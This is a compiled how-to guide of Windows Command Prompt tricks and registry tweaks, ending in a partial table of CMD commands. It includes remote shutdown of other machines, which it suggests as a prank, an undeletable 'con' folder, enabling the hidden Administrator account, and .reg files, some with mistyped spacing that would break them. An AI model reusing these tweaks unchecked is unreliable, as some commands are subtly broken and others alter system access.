Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable.
Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it.
One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter.
You can always execute prompt alone, without options, to return it to its sometimes boring default.
6. Get Help for Any Command
[image: Help Switch - Command Prompt Tricks]
Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.
I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.
Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.
7. Save a Command's Output to a File
[image: Command Output - Command Prompt Tricks]
An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators.
These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window.
For example, let's say you're about to post a computer problem to an online forum and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.
For example, you might execute systeminfo > c:\mycomputerinfo.txtto save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.
See How To Redirect Command Output to a File for more examples and a better explanation of how to use redirection operators.
8. View Your Hard Drive's Entire Directory Structure
[image: Directory Structure with Tree Command - Command Prompt Tricks]
I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories.
Execute tree from any directory to see the folder structure under that directory.
Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.
9. Customize the Command Prompt Title Bar Text
[image: Command Prompt Title Bar - Command Prompt Tricks]
Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.
For example, let's say your name is Maria Smith, and you want to express your ownership of the Command Prompt: execute title Property of Maria Smith and the Command Prompt's title bar will change immediately.
The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.
The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!
10. Copy From the Command Prompt
[image: Mark Feature in Command Prompt - Command Prompt Tricks]
As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy.
But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.
Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.
Now you can paste that information into whatever program you'd like.
11. Open the Command Prompt From Any Location
[image: Open Command Window Here - Command Prompt Tricks]
If you've ever worked in the Command Prompt for very long, you know that it can be really frustrating executing the cd/chdir command over and over again to get to the right directory you want to work from.
Luckily, there's a super easy Command Prompt trick that will let you open a Command Prompt window from whatever folder you're viewing in Windows.
All you have to do is navigate, in Windows, to the folder you want to start working from in the Command Prompt. Once there, hold down yourShift key while you right-click anywhere in the folder. Once the menu pops up, you'll notice an entry that's not usually there: Open command window here.
Click it and you'll start a new instance of the Command Prompt, ready and waiting at the right location!
If you're a Command Prompt power user, you'll immediately recognize the value in this little trick.
12. Drag and Drop For Easy Path Name Entry
[image: Command Prompt Drag and Drop - Command Prompt Tricks]
Most Command Prompt commands require you, or have options, to specify full paths to files or folders but typing out a long path can be frustrating, especially when you miss a character and have to start over.
For example, in Windows 7, the path to the Accessories group in my Start Menu isC:\Users\Tim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories. Who wants to type that all in manually? Not me.
Luckily there's a Command Prompt trick that makes this much easier: drag and drop.
Just navigate to the folder you want the path for in Windows Explorer. Once there, drag the folder or file to the Command Prompt window and let go. Like magic, the full path is inserted, saving you a considerable amount of typing depending on the length and complexity of the path name.
Note: Unfortunately, the drag and drop feature does not work in an elevated Command Prompt.
13. Shut Down or Restart Another Computer
[image: Remote Shutdown Dialog - Command Prompt Tricks]
System administrators in a business environment do this all the time for lots of reasons, but you can also shut down or restart another computer on your network, all from your computer's Command Prompt.
The easiest way to shut down a computer remotely is to executeshutdown /i from the Command Prompt which will open the Remote Shutdown Dialog, shown here. Just enter the name of the remote computer (which you can get by running the hostname command on the other PC), choose what you want to do (restart or shutdown), select some other options and then click OK.
So whether you're brushing up on your command skills or just scaring a family member, this Command Prompt trick is a fun one.
You can also shut down or restart another computer strictly from the Command Prompt with the shutdown command, without using the Remote Shutdown Dialog.
14. Use Robocopy as a Backup Solution
[image: Robocopy Command Backup - Command Prompt Tricks]
Thanks to the robocopy command, you don't need to use Window's backup software or install a third party program to manage your backups.
Just execute robocopy c:\users\tim\documents f:\backup\documents /copyall /e /r:0 /dcopy:t /mir, obviously replacing the source and destination folders with whatever you'd like to backup and where. The robocopy command with these options functions identically to an incremental backup software tool, keeping both locations in sync.
You don't have the robocopy command if you're using Windows XP or earlier. However, you do have the xcopy command, which can be used to do something very similar: xcopy c:\users\tim\documents f:\backup\documents /c /d /e /h /i /k /q /r /s /x /y.
No matter which command you choose to use, just create a script file containing the command and schedule it to run in Task Scheduler and you'll have your own custom made backup solution.
I've chosen to use the robocopy command on my personal computers as my only local backup solution because I like the level of control it gives me. Hopefully you take that as a vote of confidence in this incredibly useful Command Prompt trick.
[bookmark: _GoBack]15.  (Ipconfig command) View Your Computer's Important Network Information
[image: Ipconfig Command - Command Prompt Tricks]
Maybe just for your own information, but certainly when you're troubleshooting a network or Internet problem, you'll probably at some point need to know details about your computer's network connection.
Everything you'd want to know about your network connection is available somewhere in the Control Panel in Windows, but it's much easier to find, and much better organized, in the results from the ipconfig command.
Open Command Prompt and execute ipconfig /all. What displays on screen next is everything important about your network connection: your IP address, hostname, DHCP server, DNS information, and much, much more.
Combine this hack with Command Prompt Trick #7 and you've got a very easy way to get information about your connection to someone helping you with a problem.
16. Map a Local Folder Just Like a Network Drive
[image: Subst Command - Command Prompt Tricks]
The net use command is used to assign shared drives on a network to your own computer as a drive letter, but did you know there's another command that can be used to do the same thing to any folder on any of your local hard drives?
There is and it's called the subst command. Just execute the subst command, followed by the path of the folder you wish to appear as a drive. For example, let's say you want your C:\Windows\Fonts folder to appear as the Q: drive. Just execute subst q:  c:\windows\fonts and you're set!
This Command Prompt trick makes accessing a particular location from the Command Prompt much easier. This visual drive of folder will remain available until the compur is log off.
subst /d q:  will delete the h: virtual drive.
17. Access Previously Used Command with the Arrow Keys
[image: Arrow Keys - Command Prompt Tricks]
Another great Command Prompt trick has to be the use of the keyboard arrow keys to cycle through previously executed commands. The up and down arrow keys cycle through the commands you've entered and the right arrow automatically enters, character by character, the last command you executed.
This might not sound that interesting, but there are several situations where the arrow keys become huge time savers.
Consider this example: You've typed out 75 characters of a command and then try to execute it, only to find that you forgot to add an option at the very end. No problem, just hit the up arrow and the entire command is automatically entered in the Command Prompt window, ready for you to edit to make it work.
18. Automatically Complete Commands with Tab Completion
[image: Tab Completion - Command Prompt Tricks]net
Tab completion is another Command Prompt trick that can save you lots of time, especially if your command has a file or folder name in it that you're not completely sure of.
To use tab completion in the Command Prompt, just enter the command and then the portion of the path that you do know, if at all. Then press the tab key over and over to cycle through all of the available possibilities.
For example, let's say you want to change directories to some folder in the Windows directory but you're not sure what it's named. Type cd c:\windows\ and then press tab until you see the folder you're looking for. The results cycle or you can use Shift+Tab to step through the results in reverse.
19. Find a Website's IP Address
[image: Website IP Address - Command Prompt Tricks]
Like to know the IP address of a website? There are a few different commands you can use to find it.
Let's use the nslookup command to find the IP address of About.com. Just execute nslookup about.com and view the result. Make sure you don't confuse any private IP addresses that also show up in the nslookup results alongside About.com's public IP address.
Another way to find a site's IP address is to use the ping command. Execute ping about.com and then look at the IP address between the brackets in the results shown.
Using either Command Prompt trick, the result is 207.241.148.80.
20. Copy & Paste Easier with QuickEdit Mode
[image: QuickEdit Mode - Command Prompt Tricks]
How about an even easier way to copy from the Command Prompt? And a secret way to easily paste?
Just right-click on the Command Prompt title bar and select Properties. On the Options tab, in the Edit Options section, check the QuickEdit Mode box and then click OK.
Enabling QuickEdit Mode is like having Mark enabled all the time so selecting text to copy is really easy.
But it also enables an easy way to paste into the Command Prompt: just right click once and whatever is in the clipboard is pasted in the Command Prompt window. Normally, pasting involves right-clicking and selecting Paste.
21. Watch Star Wars Episode IV
[image: ASCII Star Wars - Command Prompt Tricks]
Yes, you read that correctly, you can watch an ASCII version of the full Star Wars Episode IV movie right in the Command Prompt window!
Just open Command Prompt and execute telnet towel.blinkenlights.nl. The movie will start immediately. This isn't a terribly productive use of the Command Prompt, nor is it really a trick of the Command Prompt or any command, but it sure is fun!
Note: The telnet command is not enabled by default in Windows 7 or Windows Vista but can be turned on by enabling Telnet Client from Windows Features in the Programs and Features applet in Control Panel. If you'd rather not enable Telnet but would like to see the movie, you can also watch it in your browser here.

66. 	Add Command Prompt to the Windows Explorer Right  
Click Menu
You can also use other .exe files instead of Command Prompt Simply change the @=” your choice:” in line 3 & @=”your choice.exe /k cd #1” in last line.

Here is how to add Command Prompt to the right click menu on a file in Windows Explorer. Create a text file, type in the following lines and save it as addprompt.reg.(file name can be name as you like)

Windows Registry Editor Version 5.00
  [HKEY_CLASSES_ROOT\*\shell\Command]
 @="Command Prompt:"
  [HKEY_CLASSES_ROOT\*\shell\Command\Command]
 @="cmd.exe / k  cd % 1"

Here is how to add Command Prompt to the right click menu on a folder in Windows Explorer. Create a text file, type in the following lines and save it as addprompt.reg.

 Windows Registry Editor Version 5.00
  [HKEY_CLASSES_ROOT\Directory\shell\Command]
 @="Command Prompt:"
  [HKEY_CLASSES_ROOT\Directory\shell\Command\Command]
 @="cmd.exe  / k  cd  % 1"

Here is how to add Command Prompt to the Desktop right click menu in Windows Explorer. Create a text file, type in the following lines and save it as addprompt.reg.

Windows Registry Editor Version 5.00
  [HKEY_CLASSES_ROOT\Directory\Background\shell\Command]
 @="Command Prompt:"
  [HKEY_CLASSES_ROOT\Directory\Background\shell\Command\Command]
  @="cmd.exe  / k  cd  % 1"


 
Save this out and double click the file. Note this will modify the registry but we promise it is safe. Your anti-virus software might ask you to confirm the registry change and it is safe to allow it.

This adds Command Prompt to the Windows Explorer right click menu. Just right click on a folder, click Command Prompt and you will be at the command prompt in the selected folder. No need to type CD and the full path anymore.

67. Adding Restart & Shutdown menu in desktop right click

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\Restart Computer]
"icon"="shell32.dll,-221"
"Position"="Bottom"
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\Shutdown Computer]
"icon"="shell32.dll,-329"
"Position"="Bottom"
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\Restart Computer\command]
@="shutdown.exe -r -t 00 -f"
[HKEY_CLASSES_ROOT\DesktopBackground\Shell\Shutdown Computer\command]
@="shutdown.exe -s -t 00 -f"

Other Option id directly editing registry : Startmanu—run—regedit enter key will open the registry key folders and edit there directly.
Open up regedit.exe through the start menu search or run box, and then browse down to the following key: Examples are belows:-
Add Control Panel to the Desktop Right-Click Menu

HKEY_CLASSES_ROOT\Directory\Background\shell
Once you are there, you’ll want to right-click on “shell” and create a new key called Control Panel.
[image: http://cdn.howtogeek.com/wp-content/uploads/2008/11/image23.png]
Under that one, you’ll want to right-click and create a new key called “command”.

Select the “command” key on the left-hand side, and then set the (Default) value on the right-hand side to the following:
Control.exe
You should immediately see the new item in your context menu, and it should be working. To remove, simply delete the Control Panel key.

Change the Registered Owner in Windows with regedit.exe
If you’ve ever wondered how to change the name of the person that Windows is registered to, this is the quick tip for you. It’s not all that useful, but it might come in handy if you got a computer from somebody else.
Open up regedit.exe through the start menu search box, and then locate the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
[image: image]
Now you can find the RegisteredOwner and RegisteredOrganization keys in the right-hand pane. Change them to whatever values you want.
To show off the registry owner/new changes, just type winver.exe into the start menu search box to see the About Windows box.
Prevent Windows Update from Forcibly Rebooting Your Computer with regedit
[image: http://cdn.howtogeek.com/wp-content/uploads/2007/06/image7.png]You’ve probably seen the dialog box prompting you to reboot your computer to finish installing important updates when you were very busy and could not reboot. It’s probably designed to pop up when we are the most busy.
However, there are a couple of ways that you can disable this behavior. The prompt will still display, but you won’t be forced to shut down your computer. The following article explains how to do it.
Open up regedit.exe through the start menu search box or run dialog, and navigate down to the following key, creating new keys if they don’t exist.
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
[image: http://cdn.howtogeek.com/wp-content/uploads/2007/10/image74.png]
Create a new 32-bit DWORD value named NoAutoRebootWithLoggedOnUsers and give it a value of 1 to prevent automatic reboot while users are logged on. Delete the value to put things back to the way they were.

68. 	How To Open Disk Management From the 
Command Prompt

Here's How:
In the Run Box type the following command  or open Command prompt and type
diskmgmt.msc
...and then hit the Enter key or press the OK button.
Note: Technically, opening Disk Management from the Command Prompt would require that you actually open the Command Prompt program. However, running an executable program like diskmgmt.msc from the search or run box accomplishes the same thing.

69. HOW TO MAKE AN NON-DELETE ABLE FOLDER
0
There is  a way that if you want to create a folder that cannot be deleted by any user, then how could you proceed. 
Open Command Prompt as administrator
             md\\.\<YourDrivehere>:\con  (Replace YourDriveHere with your desired drive and you can add further path too.)
Example : c:\md\\.\c:\con (will create a folder name con)
             Now, ask your friends to delete it, and they will be amazed as folder cannot be deleted. Actually, this is due to the bug that windows cannot create a folder named con, So, it can`t delete a folder which it don`t think is created.
To delete
However, if you ever want to delete this folder, Do remember that it won`t get deleted by normal deletion but rather by this command:
            rd\\.\ <YourDrivehere> :\con (Replace YourDriveHere with your desired drive and you can add further path too.)
Examle : c:\rd\\.\c:\con
70.	ENABLE THE HIDDEN ADMINISTRATOR ACCOUNT ON 
WINDOWS 7 OR VISTA
Open Command Prompt as administrator
Type the command : net user administrator  /active:yes (for Vista& Windows 7)

You should see a message that the command completed successfully. Log out, and you’ll now see the Administrator account as a choice.
To Disable Administrator Account
Open Command Prompt as administrator
Type the command : net user administrator  /active:no (for Vista & Windows 7)
I don’t know for Windows 7

71.	RUNNING SYSTEM RESTORE FROM COMMAND PROMPT 
IN WIN XP, WIN 7
At the Command Prompt, type C:\windows\system32\restore\rstrui.exe and press Enter.

72.	COMMAND PROMPT USE IN WINDOWS XP,
WIN-7 & WIN-8 
Below is a complete list of Command Prompt commands, often called CMD commands (and sometimes incorrectly as Command Prompt codes) available from the Command Prompt inWindows 8, Windows 7, Windows Vista, and Windows XP. As I mentioned above, I've also included DOS commands from MS-DOS and Windows 98/95:

Note: The command information below is current to the latest version number or service pack: MS-DOS 6.22, Windows 98 SE, Windows XP SP3, Windows Vista SP2, Windows 7 SP1, and Windows 8.


Commands and Their Availability from MS-DOS 6.22 through Windows 8
	Command
	Discription
	Win 98
	Win XP
	Win Vista
	Win 7
	Win 8

	Append
	The append command can be used by programs to open files in another directory as if they were located in the current directory.
	Y
	Y1
	Y1
	Y1
	Y1

	Arp
	The arp command is used to display or change entries in the ARP cache.
	Y
	Y
	Y
	Y
	Y

	Assoc
	The assoc command is used to display or change the file type associated with a particular file extension.
	N
	Y
	Y
	Y
	Y

	At
	The at command is used to schedule commands and other programs to run at a specific date and time.
	N
	Y
	Y
	Y
	Y

	Atmadm
	The atmadm command is used to display information related to asynchronous transfer mode (ATM) connections on the system.
	N
	Y
	N
	N
	N

	Attrib
	The attrib command is used to change the attributes of a single file or a directory.
	Y
	Y
	Y
	Y
	Y

	Auditpol
	The auditpol command is used to display or change audit policies.
	N
	N
	Y
	Y
	Y

	Bcdboot
	The bcdboot command is used to copy boot files to the system partition and to create a new system BCD store.
	N
	N
	N
	Y
	Y

	Bcdedit
	The bcdedit command is used to view or make changes to Boot Configuration Data.
	N
	N
	Y
	Y
	Y

	Bdehdcfg
	The bdehdcfg command is used to prepare a hard drive for BitLocker Drive Encryption.
	N
	N
	N
	Y
	Y

	Bitsadmin
	The bitsadmin command is used to create, manage, and monitor download and upload jobs.
	N
	N
	Y
	Y
	Y

	Bootcfg
	The bootcfg command is used to build, modify, or view the contents of the boot.ini file, a hidden file that is used to identify in what folder, on which partition, and on which hard drive Windows is located
	N
	Y
	Y
	Y
	Y

	Bootsect
	The bootsect command is used to configure the master boot code to one compatible with BOOTMGR (Vista and later) or NTLDR (XP and earlier).
	N
	N
	Y10
	Y10
	Y

	Break
	The break command sets or clears extended CTRL+C checking on DOS systems.
	Y
	Y
	Y
	Y
	Y

	Cacls
	The cacls command is used to display or change access control lists of files.
	N
	Y
	Y
	Y
	Y

	Call
	The call command is used to run a script or batch program from within another script or batch program.
	Y
	Y
	Y
	Y
	Y

	Cd
	The cd command is the shorthand version of the chdir command.
	Y
	Y
	Y
	Y
	Y

	Certreq
	The certreq command is used to perform various certification authority (CA) certificate functions.
	N
	N
	Y
	Y
	Y

	Certutil
	The certutil command is used to dump and display certification authority (CA) configuration information in addition to other CA functions.
	N
	N
	Y
	Y
	Y

	Change
	The change command changes various terminal server settings like install modes, COM port mappings, and logons
	N
	N
	Y
	Y
	Y

	Chcp
	The chcp command displays or configures the active code page number.
	Y
	Y
	Y
	Y
	Y

	Chdir
	The chdir command is used to display the drive letter and folder that you are currently in. Chdir can also be used to change the drive and/or directory that you want to work in.
	Y
	Y
	Y
	Y
	Y

	Checknetisolation
	The checknetisolation command is used to test apps that require network capabilities.
	N
	N
	N
	N
	Y

	Chglogon
	The chglogon command enables, disables, or drains terminal server session logins
	N
	N
	Y
	Y
	Y

	Chgport
	The chgport command can be used to display or change COM port mappings for DOS compatibility.
	N
	N
	Y
	Y
	Y

	Chgusr
	The chgusr command is used to change the install mode for the terminal server.
	N
	N
	Y
	Y
	Y

	Chkdsk
	The chkdsk command, often referred to as check disk, is used to identify and correct certain hard drive errors.
	Y
	Y
	Y
	Y
	Y

	Chkntfs
	The chkntfs command is used to configure or display the checking of the disk drive during the Windows boot process.
	N
	Y
	Y
	Y
	Y

	Choice
	The choice command is used within a script or batch program to provide a list of choices and return the value of that choice to the program.
	Y
	N
	Y
	Y
	Y

	Cipher
	The cipher command shows or changes the encryption status of files and folders on NTFS partitions.
	N
	Y
	Y
	Y
	Y

	Clip
	The clip command is used to redirect the output from any command to the clipboard in Windows.
	N
	N
	Y
	Y
	Y

	Cls
	The cls command clears the screen of all previously entered commands and other text.
	Y
	Y
	Y
	Y
	Y

	Cmd
	The cmd command starts a new instance of the cmd.exe command interpreter.
	N
	Y
	Y
	Y
	Y

	Cmdkey
	The cmdkey command is used to show, create, and remove stored user names and passwords.
	N
	N
	Y
	Y
	Y

	Cmstp
	The cmstp command installs or uninstalls a Connection Manager service profile.
	N
	Y
	Y
	Y
	Y

	Color
	The color command is used to change the colors of the text and background within the Command Prompt window
	N
	Y
	Y
	Y
	Y

	Command
	The command command starts a new instance of the command.com command interpreter.
	Y
	Y1
	Y1
	Y1
	Y1

	Comp
	The comp command is used to compare the contents of two files or sets of files.
	N
	Y
	Y
	Y
	Y

	Compact
	The compact command is used to show or change the compression state of files and directories on NTFS partitions.
	N
	Y
	Y
	Y
	Y

	Convert
	The convert command is used to convert FAT or FAT32 formatted volumes to the NTFS format.
	N
	Y
	Y
	Y
	Y

	Copy
	The copy command does simply that - it copies one or more files from one location to another.
	Y
	Y
	Y
	Y
	Y

	Cscript
	The cscript command is used to execute scripts via Microsoft Script Host.
	Y
	Y
	Y
	Y
	Y

	Ctty
	The ctty command is used to change the default input and output devices for the system.
	Y
	N
	N
	N
	N

	Date
	The date command is used to show or change the current date.
	Y
	Y
	Y
	Y
	Y

	Dblspace
	The dblspace command is used to create or configure DoubleSpace compressed drives.
	Y
	N
	N
	N
	N

	Debug
	The debug command starts Debug, a command line application used to test and edit programs.
	Y
	Y1
	Y1
	Y1
	Y1

	Defrag
	The defrag command is used to defragment a drive you specify. The defrag command is the command line version of Microsoft's Disk Defragmenter.
	Y
	Y
	Y
	Y
	Y

	Del
	The del command is used to delete one or more files.
	Y
	Y
	Y
	Y
	Y

	Deltree
	The deltree command is used to delete a directory and all the files and subdirectories within it.
	Y
	N
	N
	N
	N

	Diantz
	The diantz command is used to losslessly compress one or more files. The diantz command is sometimes called Cabinet Maker.
	N
	Y
	Y
	Y
	N

	Dir
	The dir command is used to display a list of files and folders contained inside the folder that you are currently working in. The dir command also displays other important information like the hard drive's serial number, the total number of files listed, their combined size, the total amount of free space left on the drive, and more.
	Y
	Y
	Y
	Y
	Y

	Diskcomp
	The diskcomp command is used to compare the contents of two floppy disks.
	Y
	Y
	Y
	Y
	Y

	Diskcopy
	The diskcopy command is used to copy the entire contents of one floppy disk to another.
	Y
	Y
	Y
	Y
	Y

	Diskpart
	The diskpart command is used to create, manage, and delete hard drive partitions.
	N
	Y
	Y
	Y
	Y

	Diskperf
	The diskperf command is used to manage disk performance counters remotely.
	N
	Y
	Y
	Y
	Y

	Diskraid
	The diskraid command starts the DiskRAID tool which is used to manage and configure RAID arrays.
	N
	N
	Y
	Y
	Y

	Dism
	The dism command starts the Deployment Image Servicing and Management tool (DISM). The DISM tool is used to manage features in Windows images.
	N
	N
	N
	Y
	Y

	Dispdiag
	The dispdiag command is used to output a log of information about the display system.
	N
	N
	Y
	Y
	Y

	Djoin
	The djoin command is used to create a new computer account in a domain.
	N
	N
	Y
	Y
	Y

	Doskey
	The doskey command is used to edit command lines, create macros, and recall previously entered commands.
	Y
	Y
	Y
	Y
	Y

	Dosshell
	The dosshell command starts DOS Shell, a graphical file management tool for MS-DOS.
	Y
	N
	N
	N
	N

	Dosx
	The dosx command is used to start DOS Protected Mode Interface (DPMI), a special mode designed to give MS-DOS applications access to more than the normally allowed 640 KB.
	N
	Y1
	Y1
	Y1
	Y1

	Driverquery
	The driverquery command is used to show a list of all installed drivers.
	N
	Y
	Y
	Y
	Y

	Drvspace
	The drvspace command is used to create or configure DriveSpace compressed drives.
	Y
	N
	N
	N
	N

	Echo
	The echo command is used to show messages, most commonly from within script or batch files. The echo command can also be used to turn the echoing feature on or off.
	Y
	Y
	Y
	Y
	Y

	Edit
	The edit command starts the MS-DOS Editor tool which is used to create and modify text files.
	Y
	Y1
	Y1
	Y1
	Y1

	Edlin
	The edlin command starts the Edlin tool which is used to create and modify text files from the command line.
	Y
	Y1
	Y1
	Y1
	Y1

	Emm386
	The emm386 command is used to give MS-DOS access to more than 640 KB of memory.
	Y
	N
	N
	N
	N

	Endlocal
	The endlocal command is used to end the localization of environment changes inside a batch or script file.
	N
	Y
	Y
	Y
	Y

	Erase
	The erase command is used to delete one or more files.
	Y
	Y
	Y
	Y
	Y

	Esentutl
	The esentutl command is used to manage Extensible Storage Engine databases.
	N
	Y
	Y
	Y
	Y

	Eventcreate
	The eventcreate command is used to create a custom event in an event log.
	N
	Y
	Y
	Y
	Y

	Eventtriggers
	The eventtriggers command is used to configure and display event triggers.
	N
	Y
	N
	N
	N

	Exe2Bin
	The exe2bin command is used to convert a file of the EXE file type (executable file) to a binary file.
	N
	Y1
	Y1
	Y1
	Y1

	Exit
	The exit command is used to end the cmd.exe (Windows) or command.com (MS-DOS) session that you're currently working in.
	Y
	Y
	Y
	Y
	Y

	Expand
	The expand command is used to extract a single file or a group of files from a compressed file.
	Y
	Y1
	Y
	Y
	Y

	Extrac32
	The extrac32 command is used to extract the files and folders contained in Microsoft Cabinet (CAB) files.
	Y
	Y
	Y
	Y
	Y

	Extract
	The extract command is used to extract the files and folders contained in Microsoft Cabinet (CAB) files.
	Y
	N
	N
	N
	N

	Fasthelp
	The fasthelp command provides more detailed information on any of the other MS-DOS commands.
	N
	N
	N
	N
	N

	Fastopen
	The fastopen command is used to add a program's hard drive location to a special list stored in memory, potentially improving the program's launch time by removing the need for MS-DOS to locate the application on the drive.
	Y
	Y1
	Y1
	Y1
	Y1

	Fc
	The fc command is used to compare two individual or sets of files and then show the differences between them.
	Y
	Y
	Y
	Y
	Y

	Fdisk
	The fdisk command is used to create, manage, and delete hard drive partitions.
	Y
	N
	N
	N
	N

	Find
	The find command is used to search for a specified text string in one or more files.
	Y
	Y
	Y
	Y
	Y

	Findstr
	The findstr command is used to find text string patterns in one or more files.
	N
	Y
	Y
	Y
	Y

	Finger
	The finger command is used to return information about one or more users on a remote computer that's running the Finger service.
	N
	Y
	Y
	Y
	Y

	Fltmc
	The fltmc command is used to load, unload, list, and otherwise manage Filter drivers.
	N
	Y
	Y
	Y
	Y

	Fondue
	The fondue command, short for Features on Demand User Experience Tool, is used to install any of the several optional Windows features from the command line.
	N
	N
	N
	N
	Y

	For
	The for command is used to run a specified command for each file in a set of files. The for command is most often used within a batch or script file.
	Y
	Y
	Y
	Y
	Y

	Forcedos
	The forcedos command is used to start the specified program in the MS-DOS subsystem.
	N
	Y
	N
	N
	N

	Forfiles
	The forfiles command selects one or more files to execute a specified command on. The forfiles command is most often used within a batch or script file.
	N
	N
	Y
	Y
	Y

	Format
	The format command is used to format a drive in the file system that you specify.
	Y
	Y
	Y
	Y
	Y

	Fsutil
	The fsutil command is used to perform various FAT and NTFS file system tasks like managing reparse points and sparse files, dismounting a volume, and extending a volume.
	N
	Y
	Y
	Y
	Y

	Ftp
	The ftp command can used to transfer files to and from another computer. The remote computer must be operating as an FTP server.
	Y
	Y
	Y
	Y
	Y

	Ftype
	The ftype command is used to define a default program to open a specified file type.
	N
	Y
	Y
	Y
	Y

	Getmac
	The getmac command is used to display the media access control (MAC) address of all the network controllers on a system.
	N
	Y
	Y
	Y
	Y

	Goto
	The goto command is used in a batch or script file to direct the command process to a labeled line in the script.
	Y
	Y
	Y
	Y
	Y

	Gpresult
	The gpresult command is used to display Group Policy settings.
	N
	Y
	Y
	Y
	Y

	Gpupdate
	The gpupdate command is used to update Group Policy settings.
	N
	Y
	Y
	Y
	Y

	Graftabl
	The graftabl command is used to enable the ability of Windows to display an extended character set in graphics mode.
	Y
	Y1
	Y1
	Y1
	Y1

	Graphics
	The graphics command is used to load a program that can print graphics.
	Y
	Y1
	Y1
	Y1
	Y1

	Help
	The help command provides more detailed information on other Command Prompt or DOS commands.
	Y
	Y
	Y
	Y
	Y

	Hostname
	The hostname command displays the name of the current host.
	N
	Y
	Y
	Y
	Y

	Hwrcomp
	The hwrcomp command is used to compile custom dictionaries for handwriting recognition.
	N
	N
	N
	Y
	Y

	Hwrreg
	The hwrreg command is used to install a previously compiled custom dictionary for handwriting recognition.
	N
	N
	N
	Y
	Y

	Icacls
	The icacls command is used to display or change access control lists of files.
	N
	N
	Y
	Y
	Y

	If
	The if command is used to perform conditional functions in a batch file.
	Y
	Y
	Y
	Y
	Y

	Interlnk
	The interlnk command is used to connect two computers via a serial or parallel connection to share files and printers.
	N
	N
	N
	N
	N

	Intersvr
	The intersvr command is used to start the Interlnk server and to copy Interlnk files from one computer to another.
	N
	N
	N
	N
	N

	Ipconfig
	The ipconfig command is used to display detailed IP information for each network adapter utilizing TCP/IP. The ipconfig command can also be used to release and renew IP addresses on systems configured to receive them via a DHCP server.
	Y
	Y
	Y
	Y
	Y

	Ipxroute
	The ipxroute command is used to display and change information about IPX routing tables.
	N
	Y
	N
	N
	N

	Irftp
	The irftp command is used to transmit files over an infrared link.
	N
	N
	Y
	Y
	Y

	Iscsicli
	The iscsicli command starts the Microsoft iSCSI Initiator, used to manage iSCSI.
	N
	N
	Y
	Y
	Y

	Kb16
	The kb16 command is used to support MS-DOS files that need to configure a keyboard for a specific language.
	N
	Y1
	Y1
	Y1
	Y1

	Keyb
	The keyb command is used to configure a keyboard for a specific language.
	Y
	N
	N
	N
	N

	Klist
	The klist command is used to list Kerberos service tickets. The klist command can also be used to purge Kerberos tickets.
	N
	N
	N
	Y
	Y

	Ksetup
	The ksetup command is used to configure connections to a Kerberos server.
	N
	N
	N
	Y
	Y

	Ktmutil
	The ktmutil command starts the Kernel Transaction Manager utility.
	N
	N
	Y
	Y
	Y

	Label
	The label command is used to manage the volume label of a disk.
	Y
	Y
	Y
	Y
	Y

	Lh
	The lh command is the shorthand version of the loadhigh command.
	Y
	N
	N
	N
	N

	Licensingdiag
	The licensingdiag command is a tool used to generate a text-based log and other data files that contain product activation and other Windows licensing information.
	N
	N
	N
	N
	Y

	Loadfix
	The loadfix command is used to load the specified program in the first 64K of memory and then runs the program.
	Y
	Y1
	Y1
	Y1
	Y1

	Loadhigh
	The loadhigh command is used to load a program into high memory and is usually used from within the autoexec.bat file.
	Y
	N
	N
	N
	N

	Lock
	The lock command is used to lock a drive, enabling direct disk access for a program.
	Y
	N
	N
	N
	N

	Lodctr
	The lodctr command is used to update registry values related to performance counters.
	Y
	Y
	Y
	Y
	Y

	Logman
	The logman command is used to create and manage Event Trace Session and Performance logs. The logman command also supports many functions of Performance Monitor.
	N
	Y
	Y
	Y
	Y

	Logoff
	The logoff command is used to terminate a session.
	N
	Y
	Y
	Y
	Y

	Lpq
	The lpq command displays the status of a print queue on a computer running Line Printer Daemon (LPD).
	Y
	Y
	Y2
	Y2
	Y2

	Lpr
	The lpr command is used to send a file to a computer running Line Printer Daemon (LPD).
	Y
	Y
	Y2
	Y2
	Y2

	Makecab
	The makecab command is used to losslessly compress one or more files. The makecab command is sometimes called Cabinet Maker.
	N
	Y
	Y
	Y
	Y

	Manage-bde
	The manage-bde command is used to configure BitLocker Drive Encryption from the command line.
	N
	N
	N9
	Y
	Y

	Md
	The md command is the shorthand version of the mkdir command.
	Y
	Y
	Y
	Y
	Y

	Mem
	The mem command shows information about used and free memory areas and programs that are currently loaded into memory in the MS-DOS subsystem.
	Y
	Y1
	Y1
	Y1
	Y1

	Memmaker
	The memmaker command is used to start MemMaker, a memory optimization tool.
	Y
	N
	N
	N
	N

	Mkdir
	The mkdir command is used to create a new folder.
	Y
	Y
	Y
	Y
	Y

	Mklink
	The mklink command is used to create a symbolic link.
	N
	N
	Y
	Y
	Y

	Mode
